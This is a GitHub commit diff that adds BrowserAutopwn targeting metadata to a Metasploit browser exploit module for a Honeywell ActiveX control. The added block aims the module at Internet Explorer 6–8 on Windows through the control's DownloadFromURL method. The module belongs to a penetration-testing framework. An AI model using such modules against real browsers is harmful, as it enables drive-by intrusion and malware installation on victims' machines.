Skip to content

Commit 52982c0

Browse files
author
jvazquez-r7
committed
Added BrowserAutopwn info
1 parent 0e475df commit 52982c0

File tree

1 file changed

+12
-0
lines changed

1 file changed

+12
-0
lines changed

modules/exploits/windows/browser/honeywell_tema_exec.rb

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -13,6 +13,18 @@ class Metasploit3 < Msf::Exploit::Remote
1313
include Msf::Exploit::Remote::HttpServer::HTML
1414
include Msf::Exploit::EXE
1515
include Msf::Exploit::FileDropper
16+
include Msf::Exploit::Remote::BrowserAutopwn
17+
18+
autopwn_info({
19+
:ua_name => HttpClients::IE,
20+
:ua_minver => "6.0",
21+
:ua_maxver => "8.0",
22+
:javascript => true,
23+
:os_name => OperatingSystems::WINDOWS,
24+
:rank => NormalRanking,
25+
:classid => "{E01DF79C-BE0C-4999-9B13-B5F7B2306E9B}",
26+
:method => "DownloadFromURL"
27+
})
1628

1729
def initialize(info={})
1830
super(update_info(info,

0 commit comments

Comments
 (0)